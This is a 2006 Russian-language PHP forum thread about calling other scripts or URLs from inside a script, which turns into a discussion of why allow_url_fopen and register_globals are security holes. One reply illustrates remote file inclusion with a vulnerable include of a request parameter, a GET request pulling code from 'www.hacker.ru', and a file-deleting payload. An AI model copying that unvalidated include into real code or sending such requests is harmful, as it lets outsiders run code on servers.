Гость
Войти | Профиль | Очистить
Целевая тема:
Создать новую тему:
Автор:
Действия ...
Форумы / PHP, Perl, Python [игнор отключен] [закрыт для гостей] / (PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL? / 11 сообщений из 11, страница 1 из 1
17.01.2006, 13:34
    #33487064
DIEV.ru
DIEV.ru
Гость
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?
Как внутри скрипта сделать прямой вызов друго скрипта или URL?
Код: plaintext
1.
2.
<?
  [перейти на www.sql.ru]
?>
как это будет выглядеть?
...
Рейтинг: 0 / 0
| Ответить | Цитировать | Написать  
17.01.2006, 14:07
    #33487186
Еретик
Еретик
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?
Код: plaintext
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
<?php

require 'prepend.php';

require $somefile;

require ('somefile.txt');

?>

Или то же самое с include()

URL можно вызывать, если для виртуального хоста или глобально установлен флаг allow_url_fopen (в php.ini или в конфигурационных файлах апача - httpd.conf, .htaccess)


Код: plaintext
 allow_url_fopen On
...
Рейтинг: 0 / 0
| Ответить | Цитировать | Написать  
17.01.2006, 14:07
    #33487187
lissyara
lissyara
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?
Определитесь, что нужно - на мой взгляд несколько разные задачи.....


Posted via ActualForum NNTP Server 1.3
...
Рейтинг: 0 / 0
| Ответить | Цитировать | Написать  
17.01.2006, 14:26
    #33487258
lissyara
lissyara
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?
Не успел :)


Posted via ActualForum NNTP Server 1.3
...
Рейтинг: 0 / 0
| Ответить | Цитировать | Написать  
17.01.2006, 16:55
    #33487786
Еретик
Еретик
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?
Еретик
Код: plaintext
 allow_url_fopen On


Забыл сказать, что это дыра в безопасности, особенно если еще register_globals On
...
Рейтинг: 0 / 0
| Ответить | Цитировать | Написать  
17.01.2006, 18:23
    #33488091
DocAl
DocAl
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?
С регистер_глобалс он -- это всё одна сплошная дыра...
...
Рейтинг: 0 / 0
| Ответить | Цитировать | Написать  
17.01.2006, 21:54
    #33488306
twistfire
twistfire
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?
а не могли бы Вы объяснить - почему когда register_globals=on то это дыра?
Из-за чего? По причине возможности атак на скрипті которіе воспринимают парпметрі, либо по какой-то другой?
...
Рейтинг: 0 / 0
| Ответить | Цитировать | Написать  
17.01.2006, 22:21
    #33488320
*
*
Гость
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?
twistfireа не могли бы Вы объяснить - почему когда register_globals=on то это дыра?
www.php.net/registerglobals
...
Рейтинг: 0 / 0
| Ответить | Цитировать | Написать  
18.01.2006, 00:15
    #33488383
Еретик
Еретик
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?
twistfireа не могли бы Вы объяснить - почему когда register_globals=on то это дыра?
Из-за чего? По причине возможности атак на скрипті которіе воспринимают парпметрі, либо по какой-то другой?

total_hole.php на www.your-host.ru:
Код: plaintext
1.
2.
3.
<?php
include $somefile
?>

Вызываем:

GET http://www.your-host.ru/total_hole.php?somefile=http://www.hacker.ru/envy.txt


envy.txt на www.hacker.ru:
Код: plaintext
1.
2.
3.
<?
 unlink(*.*);
?>
...
Рейтинг: 0 / 0
| Ответить | Цитировать | Написать  
18.01.2006, 07:53
    #33488493
*
*
Гость
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?
Еретик twistfireа не могли бы Вы объяснить - почему когда register_globals=on то это дыра?
Из-за чего? По причине возможности атак на скрипті которіе воспринимают парпметрі, либо по какой-то другой?

total_hole.php на www.your-host.ru:
Код: plaintext
1.
2.
3.
<?php
include $somefile
?>

Вызываем:

GET http://www.your-host.ru/total_hole.php?somefile=http://www.hacker.ru/envy.txt


envy.txt на www.hacker.ru:
Код: plaintext
1.
2.
3.
<?
 unlink(*.*);
?>
А при чём тут register_globals? Дыра-то не в ней. Ну напишете вы
Код: plaintext
<?include $_GET['somefile']?>
- в плане безопасности это ничего не изменит (с тем же успехом $_POST/$_COOKIE/$_REQUEST).
...
Рейтинг: 0 / 0
| Ответить | Цитировать | Написать  
18.01.2006, 10:07
    #33488666
twistfire
twistfire
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
(PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL?
усе равно спасибо :)
...
Рейтинг: 0 / 0
| Ответить | Цитировать | Написать  
Форумы / PHP, Perl, Python [игнор отключен] [закрыт для гостей] / (PHP) Как внутри скрипта сделать прямой вызов друго скрипта или URL? / 11 сообщений из 11, страница 1 из 1
Найденые пользователи ...
Разблокировать пользователей ...
Читали тему (0):
Читали форум (0):
Пользователи онлайн (0):
Польз. соглашение  
Полит. конфиден.  
созд. / загр.: 330ms
Закрыть
start [/forum/topic.php?fid=23&mobile=1&tid=1476939]:
 0ms
get settings:
 7ms
get forum list:
 11ms
check forum access:
 2ms
check topic access:
 2ms
track hit:
 33ms
get topic data:
 7ms
get forum data:
 2ms
get page messages:
 32ms
get tp. blocked users:
 1ms
others: 233ms
total:  330ms
x
x
Закрыть


Просмотр
0 / 0
Close
Debug Console [Select Text]